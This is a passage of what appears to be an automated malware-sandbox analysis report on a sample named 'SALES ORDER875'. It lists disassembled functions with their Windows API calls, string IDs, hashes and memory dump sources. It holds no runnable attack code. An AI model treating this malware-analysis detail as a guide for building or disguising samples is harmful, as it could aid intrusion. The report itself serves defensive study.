                                                                                                                                                                                    • Opcode Fuzzy Hash: 2330328a999a4dc06bbeb25e7fec671b73e60718a88b72657a41b0e541fa07af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76610275D00219EFCF04CFA4DD88AAEBBB6FF48310F20852AE955A7290D775A941CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 003BDAA1
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD659
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD66B
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD67D
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD68F
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6A1
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6B3
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6C5
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6D7
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6E9
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD6FB
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD70D
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD71F
                                                                                                                                                                                      • Part of subcall function 003BD63C: _free.LIBCMT ref: 003BD731
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDA96
                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDAB8
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDACD
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDAD8
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDAFA
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB0D
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB1B
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB26
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB5E
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB65
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB82
                                                                                                                                                                                    • _free.LIBCMT ref: 003BDB9A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    • Opcode ID: a7e5bacfbb8c01ea7874905115ed9f76389957eae486326de9213844b5218a88
                                                                                                                                                                                    • Instruction ID: ad6432a2d22402168579e0ec296b9329113adefa5108d10e4dcd801986f49cf8
                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e5bacfbb8c01ea7874905115ed9f76389957eae486326de9213844b5218a88
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B314D31604305AFEB23AA39E845BD7B7E9FF01318F164919E649DB991EF31AC508B24
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 003E369C
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003E36A7
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003E3797
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 003E380C
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 003E385D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003E3882
                                                                                                                                                                                    • GetParent.USER32(?), ref: 003E38A0
                                                                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 003E38A7
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 003E3921
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 003E395D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                                                                                    • String ID: %s%u
                                                                                                                                                                                    • API String ID: 4010501982-679674701
                                                                                                                                                                                    • Opcode ID: 9c6cb8eb994f9377958ffd27c8c6ef31bc040f11d93e0234c3c9e5807e048afe
                                                                                                                                                                                    • Instruction ID: 67a36b046d49f84e9fa7f0e351a0c19872281bc651686463d6e26fe30ca0f0fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c6cb8eb994f9377958ffd27c8c6ef31bc040f11d93e0234c3c9e5807e048afe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7891D171200256AFD70ADF26C889BEAF7A8FF44310F008629F999D71D1DB30EA45CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 003E4994
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 003E49DA
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003E49EB
                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 003E49F7
                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 003E4A2C
                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 003E4A64
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 003E4A9D
                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 003E4AE6
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 003E4B20
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003E4B8B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                    • Opcode ID: 6f924d1ef227b015ab9d0e826fbec1f8c0b31f139a35b066271a8d7d5b4047e5
                                                                                                                                                                                    • Instruction ID: 5a4a00a2f247d65bf8b16e7e72466f93560d4a98e464e6cda7954a7a1166a8eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f924d1ef227b015ab9d0e826fbec1f8c0b31f139a35b066271a8d7d5b4047e5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E91E0310043569FDB06CF16C985BAA77E8FF88314F04866AFD859A0D6EB34ED45CBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040CC64
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0040CC8D
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040CD48
                                                                                                                                                                                      • Part of subcall function 0040CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0040CCAA
                                                                                                                                                                                      • Part of subcall function 0040CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0040CCBD
                                                                                                                                                                                      • Part of subcall function 0040CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040CCCF
                                                                                                                                                                                      • Part of subcall function 0040CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040CD05
                                                                                                                                                                                      • Part of subcall function 0040CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040CD28
                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040CCF3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                                                    • Opcode ID: 664a06654505720e5b3b8c83f342617d10704c2e796687ad3007a6d9bfda99a4
                                                                                                                                                                                    • Instruction ID: 3160d55f90f4bee260da9fee771393f145392645655d5392563c531bd0b7df44
                                                                                                                                                                                    • Opcode Fuzzy Hash: 664a06654505720e5b3b8c83f342617d10704c2e796687ad3007a6d9bfda99a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E318071941128FBD7209B90DCC8EFFBB7CEF05740F004276A905E2280D7389E459AA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • timeGetTime.WINMM ref: 003EE6B4
                                                                                                                                                                                      • Part of subcall function 0039E551: timeGetTime.WINMM(?,?,003EE6D4), ref: 0039E555
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 003EE6E1
                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 003EE705
                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003EE727
                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 003EE746
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003EE754
                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 003EE773
                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 003EE77E
                                                                                                                                                                                    • IsWindow.USER32 ref: 003EE78A
                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 003EE79B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                                                    • Opcode ID: 8b15f499ae768a69f42fb0186eb95ae236f46dbf94ca6b845ad5a0ccfc3ca35c
                                                                                                                                                                                    • Instruction ID: 1479d8f2445667985528ec6b677f1ca001c7607501705b8c0a5582c9db950c2e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b15f499ae768a69f42fb0186eb95ae236f46dbf94ca6b845ad5a0ccfc3ca35c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218170280395BFFB025F61EDC9B653B69F75534AB104535F815925F2DBB1EC008A2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003EEA5D
                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003EEA73
                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EEA84
                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003EEA96
                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003EEAA7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                                                    • Opcode ID: 7e0a84198d26413b3f8b1ad65e130d617537622ddb6ca2a6fe435fdafc9ff9e3
                                                                                                                                                                                    • Instruction ID: 8f79445f29981601f82e772d8ffedae67c1b625abff08bf6f97ca999098147b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e0a84198d26413b3f8b1ad65e130d617537622ddb6ca2a6fe435fdafc9ff9e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: B411777169036979E721B762DC4AEFF6A7CEBD2F00F11057AB811A60D1EEB40905C6B1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 003E5CE2
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 003E5CFB
                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003E5D59
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 003E5D69
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 003E5D7B
                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 003E5DCF
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 003E5DDD
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 003E5DEF
                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003E5E31
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 003E5E44
                                                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003E5E5A
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003E5E67
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                    • Opcode ID: ff4d3f4aaeafdc3a3197ca4093626b1995a4346da119d9bb8c954a3964791fcd
                                                                                                                                                                                    • Instruction ID: a95cfd3a87dacf6eb362f86f4646c7c5c1f0794a342bb9c8df29a0c9f6004889
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff4d3f4aaeafdc3a3197ca4093626b1995a4346da119d9bb8c954a3964791fcd
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9512E71A40619AFDB19CFA9CD89AAEBBB5FB48304F108229F515E72D0D7709E00CB50
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00398F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00398BE8,?,00000000,?,?,?,?,00398BBA,00000000,?), ref: 00398FC5
                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00398C81
                                                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00398BBA,00000000,?), ref: 00398D1B
                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 003D6973
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00398BBA,00000000,?), ref: 003D69A1
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00398BBA,00000000,?), ref: 003D69B8
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00398BBA,00000000), ref: 003D69D4
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003D69E6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                                                    • Opcode ID: 30171147b048978739762cfa790cfe4b2f9e6511b536170acc81ae44f2a1d644
                                                                                                                                                                                    • Instruction ID: 77790c4362fbb200e62e29d921d36afff44329b2f03697e57b68e9631f439ca7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30171147b048978739762cfa790cfe4b2f9e6511b536170acc81ae44f2a1d644
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F618A71502700DFCF229F14E959B69B7F1FB82312F158529E0929BAB0CB71AD90CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399944: GetWindowLongW.USER32(?,000000EB), ref: 00399952
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00399862
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                                                    • Opcode ID: ac164bd9c1744032a37253972242d8f8c82f23ebd06236782a0d04d7699d7d12
                                                                                                                                                                                    • Instruction ID: b52b5a788a1d9be23326fa0bc0391832db2dd75491b9ee0bdb117ba99b38f393
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac164bd9c1744032a37253972242d8f8c82f23ebd06236782a0d04d7699d7d12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C418431144654AFDF225F3CEC84BB937AAAB06371F15461EF9A2872E1D7319C42DB11
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .:
                                                                                                                                                                                    • API String ID: 0-1873446780
                                                                                                                                                                                    • Opcode ID: 0d580d0d38acaa6fde19990d68c497222172b36f52e890225e440e960e12e4e2
                                                                                                                                                                                    • Instruction ID: 6e70111f6a895d76ab4fcdecb5b9919774fa405874e43588f18d5eedbbbeb1ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d580d0d38acaa6fde19990d68c497222172b36f52e890225e440e960e12e4e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4C1F479D04349AFCB13EFA8D845BEDBBB4AF09314F15419AEB14AB792C7308941CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,003CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 003E9717
                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,003CF7F8,00000001), ref: 003E9720
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 003E9742
                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,003CF7F8,00000001), ref: 003E9745
                                                                                                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 003E9866
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                                                    • Opcode ID: fd2a64c8932d1bca1264b5b14fb480adc634b68d55c7bae73c39356a696a5075
                                                                                                                                                                                    • Instruction ID: 117d59459e16a1c14dad7712bf9d1c569cab37270df3f78ce85b11f507c57064
                                                                                                                                                                                    • Opcode Fuzzy Hash: fd2a64c8932d1bca1264b5b14fb480adc634b68d55c7bae73c39356a696a5075
